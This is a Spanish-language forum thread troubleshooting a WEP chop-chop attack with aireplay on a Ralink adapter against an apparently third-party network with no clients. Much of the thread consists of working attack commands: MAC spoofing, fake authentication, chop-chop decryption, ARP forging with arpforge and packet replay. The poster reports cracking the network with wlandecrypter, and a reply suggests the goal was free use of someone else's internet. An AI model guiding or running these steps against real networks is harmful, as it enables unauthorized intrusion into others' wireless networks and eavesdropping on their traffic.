Problema con CHOP-CHOP

[FUKER07]

El caso es que tengo un adaptador BELKIN F5D7050 ver. 3000ef con un Ralink RT2570. Se que tengo que ponerle el chyipset del rt73 que no soporta fragmentación. Entonces quiero descifrar una red que no tiene clientes y em comentaron que se podía hacer con el ataque CHOP-CHOP. El caso es que hago todo lo que viene en el tutorial de o2T7f6j2 hasta que intento desecriptar un paquete mediante:
aireplay -4 -h 00:16:38:XX:XX:2B rausb0
Entonces se pone a leer paquetes hasta que me dice que si quiero usar uno. Le doy que si. Entonces me da el siguiente error:

Failure: got severals deauthentication packets from the AP - try running another aireplay with atack "-1" (fake open-system authentication)

No se a que se puede deber ya que tengo buena señal de la AP, tengo configurada mi MAC a 00:11:22:33:44:55, y segun tengo entendido mi chipset si que soporta chop-chop.

Un saludo!!

[*dudux]

vas a postear tu duda en todos los lados??     

 

[*dudux]

algun Moderador Global que borre los otros dos ..........

estan en universo wireless,en manuales y aqui.,...........dejar uno.........

[FUKER07]

Lo siento. Esque al principio lo puse en el otro lado sin darme cuenta, pero ahora lo puse aqui porque me parece que es mas adecuado.

Pido mis disculpas!

[*dudux]

el manual de 02tf,,,, esta mal..........

aireplay-ng -4 -r 00:11:22:33:44:55 rausb0

recuerda de escojer un paquete del AP con FROMDS=1 si puede ser........

el A1 no puede caerse sino se caera todo..........

[FUKER07]

el manual de 02tf,,,, esta mal..........

aireplay-ng -4 -r 00:11:22:33:44:55 rausb0

recuerda de escojer un paquete del AP con FROMDS=1 si puede ser........

el A1 no puede caerse sino se caera todo..........

Ok, voy a probar con eso que me dices a ver que tal.
Cuando se ve que se cae el A1? Cuando desaparecen todas las redes del airodump? Porque eso me ha pasado alguna vez...
Voy a ver eso del FROMDS=1 del paquete que aun no lo he visto

Saludos!!

[FUKER07]

el manual de 02tf,,,, esta mal..........

aireplay-ng -4 -r 00:11:22:33:44:55 rausb0

Eso esta bien? Me parece que no, porque lo he probado y no funciona...
No seria: aireplay-ng -4 -h [MAC_INVENTADA] rausb0

Luego tengo otras dudas mas:

• Es normal que el A4 tarde mucho tiempo? Llevo una media hora...
• A veces el A1 como tu dices se cae y dice que no puede hacerse la asociacion, aunque a menudo vuelve a asociarse y sigue. Que se puede hacer para que no falle? Si falla y luego sigue asociandose se puede dejar que siga cogiendo las partes xor el A4??
• La red que quiero desencriptar no sube de datos. Es necesario que haya un cliente para poder seguir haciendo los siguientes pasos. Porque miro en todos los paquetes y no veo ninguno con el BSSID de la red que quiero deencriptar ya que no llegan paquetes de esa red

Gracias!

[Dyno]

para el chop chop tienes que estar autentificado falsamente, una vez eso
comprueba en iwconfig si aparecen correctas la mac objetivo y el nombre, en tu dispositivo.

Luego para el ataque del chopchop tienes que poner tambien aparte de la mac inventada, la mac objetivo, sino no funciona.

esperas unos 4 o 5 minutos como mucho y si no aparece ninguno, esque esta mal.

yo uso la ipw2200 pero creo ke sera igual, y de momento es el ataque que me resulto mas efetivo.

[FUKER07]

para el chop chop tienes que estar autentificado falsamente, una vez eso
comprueba en iwconfig si aparecen correctas la mac objetivo y el nombre, en tu dispositivo.

Luego para el ataque del chopchop tienes que poner tambien aparte de la mac inventada, la mac objetivo, sino no funciona.

esperas unos 4 o 5 minutos como mucho y si no aparece ninguno, esque esta mal.

yo uso la ipw2200 pero creo ke sera igual, y de momento es el ataque que me resulto mas efetivo.

aireplay-ng -4 -r 00:11:22:33:44:55 rausb0

Segun *dudux solo hay que poner la MAC inventada en el ataque chop-chop. Quien de los dos tiene razon?

[FUKER07]

Pongo lo que hago hasta ahora por si hay algo que esta mal....



%Paso mi tarjeta a RT73 con modo monitor y pongo una MAC falsa
rtmodrt2570
rtmortd73
modprobe rt73
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifconfig rausb0 up
iwconfig rausb0 rate 1M channel 3 mode monitor
% Capturo trafico con el Airodump
airodump rausb0 captura_chopchop.cap
% Abro una ventana nueva y hago la asociacion falsa
aireplay -1 30 -e "WLAN_05" -a 00:16:38:XX:XX:2B -h 00:11:22:33:44:55 rausb0
% Abro otra ventana y desencripto un paquete
aireplay -4 -h 00:11:22:33:44:55 rausb0

Con esta red, al no haber clientes no encuentro ningun paquete para desencriptar. Solo aparecen paquetes de redes a las que las estan llegando paquetes.
Que tengo que hacer??

Saludos!

[Serch]

Yo uso estas 2 órdenes:

rmmod rt2570
rmmod rt73

Te funciona con esas raras q pones??

[Dyno]

hombre.. el dudux sabe cien veces mas que yo, de todas formas. yo pongo estos comandos:

iwconfig ethX essid NOMBRE_DE_LA_RED channel X key 1111111111

//con lo cual se autentifica falsamente

luego

aireplay-ng -4 -b MAC:ROUTER:OBJETIVO -h MAC:INVENTADA:00:11:22 -i rtap0 ethX

espero un paquete arp, que ha veces si estas lejos tarda.. o vete tu a saber... y ya luego el arpforge y to eso...

a mi me funciona...  : no se si igual es porque es otro chipset...

pero ya te digo, en caso de duda.. no se pita.. o lo que diga dudux 

[FUKER07]

hombre.. el dudux sabe cien veces mas que yo, de todas formas. yo pongo estos comandos:

iwconfig ethX essid NOMBRE_DE_LA_RED channel X key 1111111111

//con lo cual se autentifica falsamente

luego

aireplay-ng -4 -b MAC:ROUTER:OBJETIVO -h MAC:INVENTADA:00:11:22 -i rtap0 ethX

espero un paquete arp, que ha veces si estas lejos tarda.. o vete tu a saber... y ya luego el arpforge y to eso...

a mi me funciona...  : no se si igual es porque es otro chipset...

pero ya te digo, en caso de duda.. no se pita.. o lo que diga dudux 

Si, se hace diferente por ser otro chipset. Asi se hace en los centrino que será lo que tu tienes. En los demás se debe hacer de la forma que dice dudux

[*dudux]

mira echale un vistazo a los videos de Wifislax..........y haber si te queda mas claro........

http://www.wifislax.com/soporte/videos.html

por lo demas........son demasiadas preguntas pa contestar a estas horas de la noche....

no te fies de mi al 100% ..........sino prueba lo que te dicen tb los demás........

tod@s sabemos que las centrino ipw2200 son un "mundo aparte"....desde la reinyeccion al parcheo del firmware y los drivers........menuda tela!!!

el chopchop se puede hacer con ipw2200 ,con ralink , con atheros...etcetcetc

el unico que varia bastante es con la ipw2200..........los demas son identicos simplemente cambiando la interface.................

espero haberte ayudado.............

un chopchop puede ser con un cliente verdadero o con uno falso.........

siempre es aconsejable probar un chopchop o uno de fragmentacion con cliente falso los 2........antes que usar un A1+A3.....................

Si el A1 nos funcionase y consiguiesemos un paquete cifrado tendriamos oportunidades reales y rápidas de conseguir auditar esa red.............

no se si se me olvida algo.............si no vuelve a preguntarmelo........... :

[*dudux]

ya decia que se me olvidaba algo...........si airodump se queda sin redes ........es que tu tarjeta se ha caido..........

ifconfig rausb0 down
ifconfig rausb0 up

[FUKER07]

Bueno pues al final consegui la red que queria mucho mas facil. Unicamente con dos IV´s y con el wlandecrypter


Saludos!

[*dudux]

eso se dice antes...........porque madre mia la que has liado.........

y que pasa ahora??? ya no te interesa el ataque chopchop?
solo querias internet ajeno???   

[FUKER07]

No,no es eso. Seguiré por aqui descubriendo nuevos ataques, pero necesitaba urgentemente eso como te habia dicho antes.

Un saludo!

[sezarmorante]

Yo tengo centrino y también lo hago así:

iwconfig ethX essid NOMBRE_DE_LA_RED channel X key 1111111111

aireplay-ng --ipwsys -4 -b MAC:ROUTER:OBJETIVO -h MAC:INVENTADA:00:11:22 -i rtap0 ethX

Sin embargo creo q tu problema puede ser debido al ap (No me hagais demasiado caso). Yo hablo desde mi experiencia: Con los mismos comandos, con algunos ap's al momento he conseguido el xor. Con otros, en concreto WLAN_XX, con señal mucho mejor, no hay manera de que funcione el chopchop a no ser que haya un cliente conectado. Y en este caso, por supuesto se usa wlandecrypter.
Si alguien sabe alguna forma diferente para inyectar sin clientes q avise (sé lo del wlaninject, xo en wifislax está chungo)
Salu2

[*dudux]

# Ataque 4: El "chopchop" de KoreK (predicción de CRC)

Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP en sí misma, sino que revela meramente el texto plano. De cualquier modo, la mayoría de los puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Este ataque necesita al menos un paquete de datos WEP.

 

   1. Primero, desencriptemos un paquete:

      aireplay -4 -h 00:09:5B:EB:C5:2B ath0

   2. Echemos un vistazo a la dirección IP:

      tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
      reading from file replay_dec-0627-022301.cap, link-type [...]
      IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

   3. Ahora, forjemos una petición ARP.

      La IP inicial no importa (192.168.1.100), pero la Ip de destino (192.168.1.2) debe responder a peticiones ARP. La dirección MAC inicial debe corresponder a una estación asociada.

      ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
      00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

   4. Y reenviemos nuestra petición ARP forjada:

      aireplay -2 -r arp.cap ath0

[FUKER07]

# Ataque 4: El "chopchop" de KoreK (predicción de CRC)

Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP en sí misma, sino que revela meramente el texto plano. De cualquier modo, la mayoría de los puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Este ataque necesita al menos un paquete de datos WEP.

 

   1. Primero, desencriptemos un paquete:

      aireplay -4 -h 00:09:5B:EB:C5:2B ath0

   2. Echemos un vistazo a la dirección IP:

      tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
      reading from file replay_dec-0627-022301.cap, link-type [...]
      IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

   3. Ahora, forjemos una petición ARP.

      La IP inicial no importa (192.168.1.100), pero la Ip de destino (192.168.1.2) debe responder a peticiones ARP. La dirección MAC inicial debe corresponder a una estación asociada.

      ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
      00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

   4. Y reenviemos nuestra petición ARP forjada:

      aireplay -2 -r arp.cap ath0

Eso ya lo sabemos. Lo que no sé es porqué no me funciona si lo estoy haciendo bien...

[Serch]

Esos copy/paste. Dudu, edita el post y di q 00:09:5B:EB:C5:2B es la MAC de un cliente legitimo o tambien puede ser la de un impostor y 00:13:10:30:24:9C es la MAC del AP

Lo q no has puesto es cómo escoger bien el paquete adecuado no??

[*dudux]

pues mira lo daba por claro...pero tienes razon....

escojer el paquete se habla un poco mas abajo......


pues sigue intendolo que ya veras como te acaba saliendo fuker7

[FUKER07]

Sigo sin poder tener por completo el xor. Me aparece error en el A4 antes de acabar de tener el xor...

[*dudux]

que chipset usas??


cuanta señal tienes¿¿